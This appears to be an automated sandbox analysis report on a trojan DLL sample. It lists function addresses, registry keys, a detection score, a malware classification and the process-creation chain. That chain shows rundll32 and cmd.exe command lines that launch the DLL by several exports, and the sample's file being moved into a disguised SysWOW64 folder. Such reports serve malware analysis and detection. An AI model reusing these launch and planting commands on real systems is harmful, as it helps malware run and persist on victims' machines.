Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC1C12	0_2_00BC1C12
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBF20D	0_2_00BBF20D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCE478	0_2_00BCE478
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD1C71	0_2_00BD1C71
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD0C66	0_2_00BD0C66
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC645F	0_2_00BC645F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC604E	0_2_00BC604E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB33A9	0_2_00BB33A9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC77A7	0_2_00BC77A7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCBFA1	0_2_00BCBFA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC6B91	0_2_00BC6B91
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB938F	0_2_00BB938F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD1987	0_2_00BD1987
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB7D87	0_2_00BB7D87
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBF984	0_2_00BBF984
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB1DF9	0_2_00BB1DF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCD5FE	0_2_00BCD5FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB6BFE	0_2_00BB6BFE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC91F7	0_2_00BC91F7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBFBEF	0_2_00BBFBEF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBB7EC	0_2_00BBB7EC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD35E3	0_2_00BD35E3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCE7DA	0_2_00BCE7DA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC89DA	0_2_00BC89DA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC13DB	0_2_00BC13DB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB5DC3	0_2_00BB5DC3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB39C3	0_2_00BB39C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC4DC5	0_2_00BC4DC5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC0FC5	0_2_00BC0FC5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB2DC5	0_2_00BB2DC5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB7739	0_2_00BB7739
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC473A	0_2_00BC473A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC3130	0_2_00BC3130
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBE336	0_2_00BBE336
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCCF2C	0_2_00BCCF2C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBB12E	0_2_00BBB12E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB6125	0_2_00BB6125
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC8518	0_2_00BC8518
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB8112	0_2_00BB8112
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB4716	0_2_00BB4716
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB5314	0_2_00BB5314
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC710D	0_2_00BC710D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCD10B	0_2_00BCD10B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD3306	0_2_00BD3306
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC5B7C	0_2_00BC5B7C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB597D	0_2_00BB597D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB2B7C	0_2_00BB2B7C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB2176	0_2_00BB2176
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCC772	0_2_00BCC772
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB2575	0_2_00BB2575
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB196D	0_2_00BB196D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB996C	0_2_00BB996C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCF561	0_2_00BCF561
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB5166	0_2_00BB5166
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBDD66	0_2_00BBDD66
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD2560	0_2_00BD2560
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB9565	0_2_00BB9565
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB8D59	0_2_00BB8D59
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB635F	0_2_00BB635F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD2D4F	0_2_00BD2D4F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD314A	0_2_00BD314A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB4F42	0_2_00BB4F42
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCC145	0_2_00BCC145
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED1A6D0	0_2_6ED1A6D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED1E6E0	0_2_6ED1E6E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED166E0	0_2_6ED166E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED15EA0	0_2_6ED15EA0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED20F10	0_2_6ED20F10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED11C10	0_2_6ED11C10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED175F4	0_2_6ED175F4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED19D50	0_2_6ED19D50
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED30A61	0_2_6ED30A61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED1D380	0_2_6ED1D380
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED138C0	0_2_6ED138C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED201D0	0_2_6ED201D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED1A6D0	3_2_6ED1A6D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED1E6E0	3_2_6ED1E6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED166E0	3_2_6ED166E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED15EA0	3_2_6ED15EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED20F10	3_2_6ED20F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED11C10	3_2_6ED11C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED175F4	3_2_6ED175F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED19D50	3_2_6ED19D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED30A61	3_2_6ED30A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED1D380	3_2_6ED1D380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED138C0	3_2_6ED138C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED201D0	3_2_6ED201D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C06EF	12_2_007C06EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BED95	12_2_007BED95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BE478	12_2_007BE478
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C1C71	12_2_007C1C71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C0C66	12_2_007C0C66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B645F	12_2_007B645F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B604E	12_2_007B604E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A3E3B	12_2_007A3E3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BCC3F	12_2_007BCC3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B0A37	12_2_007B0A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B0824	12_2_007B0824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BBA18	12_2_007BBA18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B1C12	12_2_007B1C12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C2C16	12_2_007C2C16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AF20D	12_2_007AF20D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C20F8	12_2_007C20F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AE6FD	12_2_007AE6FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007ABEF5	12_2_007ABEF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AA8E8	12_2_007AA8E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B7EDD	12_2_007B7EDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C0AD3	12_2_007C0AD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A54C0	12_2_007A54C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BB0BA	12_2_007BB0BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AAEB9	12_2_007AAEB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B3ABE	12_2_007B3ABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B56A9	12_2_007B56A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A68AD	12_2_007A68AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B04A4	12_2_007B04A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AF4A5	12_2_007AF4A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AC69B	12_2_007AC69B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AF699	12_2_007AF699
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AD899	12_2_007AD899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A3085	12_2_007A3085
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A2B7C	12_2_007A2B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B5B7C	12_2_007B5B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A597D	12_2_007A597D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BC772	12_2_007BC772
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A2176	12_2_007A2176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A2575	12_2_007A2575
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A996C	12_2_007A996C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A196D	12_2_007A196D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BF561	12_2_007BF561
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A5166	12_2_007A5166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007ADD66	12_2_007ADD66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C2560	12_2_007C2560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A9565	12_2_007A9565
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A8D59	12_2_007A8D59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A635F	12_2_007A635F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C2D4F	12_2_007C2D4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C314A	12_2_007C314A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A4F42	12_2_007A4F42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BC145	12_2_007BC145
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B473A	12_2_007B473A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A7739	12_2_007A7739
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B3130	12_2_007B3130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AE336	12_2_007AE336
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AB12E	12_2_007AB12E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BCF2C	12_2_007BCF2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A6125	12_2_007A6125
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B8518	12_2_007B8518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A8112	12_2_007A8112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A4716	12_2_007A4716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A5314	12_2_007A5314
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BD10B	12_2_007BD10B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B710D	12_2_007B710D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C3306	12_2_007C3306
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A1DF9	12_2_007A1DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A6BFE	12_2_007A6BFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BD5FE	12_2_007BD5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B91F7	12_2_007B91F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AFBEF	12_2_007AFBEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AB7EC	12_2_007AB7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C35E3	12_2_007C35E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B13DB	12_2_007B13DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BE7DA	12_2_007BE7DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B89DA	12_2_007B89DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A5DC3	12_2_007A5DC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A39C3	12_2_007A39C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B4DC5	12_2_007B4DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B0FC5	12_2_007B0FC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A2DC5	12_2_007A2DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A33A9	12_2_007A33A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007BBFA1	12_2_007BBFA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B77A7	12_2_007B77A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A938F	12_2_007A938F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007C1987	12_2_007C1987
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A7D87	12_2_007A7D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007AF984	12_2_007AF984

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6ED11C10 appears 97 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6ED2D350 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6ED11C10 appears 97 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6ED2D350 appears 33 times

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: 6zAcNlJXo7.dll

Virustotal: Detection: 23%

Source: 6zAcNlJXo7.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,axamexdrqyrgb
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,bhramccfbdd
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vxxnweikxwymx\qsgm.ruf",Yyhhzevh
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4600 -ip 4600
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 316
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4600 -ip 4600
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 324
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vxxnweikxwymx\qsgm.ruf",Control_RunDLL
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,axamexdrqyrgb	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,bhramccfbdd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vxxnweikxwymx\qsgm.ruf",Yyhhzevh	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vxxnweikxwymx\qsgm.ruf",Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4600 -ip 4600	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 316	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4600 -ip 4600	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 324	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F19.tmp

Jump to behavior

Source: classification engine

Classification label: mal80.troj.evad.winDLL@32/14@0/30

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:2984:64:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:4764:64:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4600

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: 6zAcNlJXo7.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 6zAcNlJXo7.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.649095483.000000000467A000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.659957517.0000000000832000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB005E push esp; iretd	0_2_00BB0061
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB151C push ds; ret	0_2_00BB1527
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB150F push ds; ret	0_2_00BB1527
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED39153 push ecx; ret	0_2_6ED39166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED39153 push ecx; ret	3_2_6ED39166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A005E push esp; iretd	12_2_007A0061
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A151C push ds; ret	12_2_007A1527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007A150F push ds; ret	12_2_007A1527

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED1E4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

0_2_6ED1E4E0

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Vxxnweikxwymx\qsgm.ruf

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

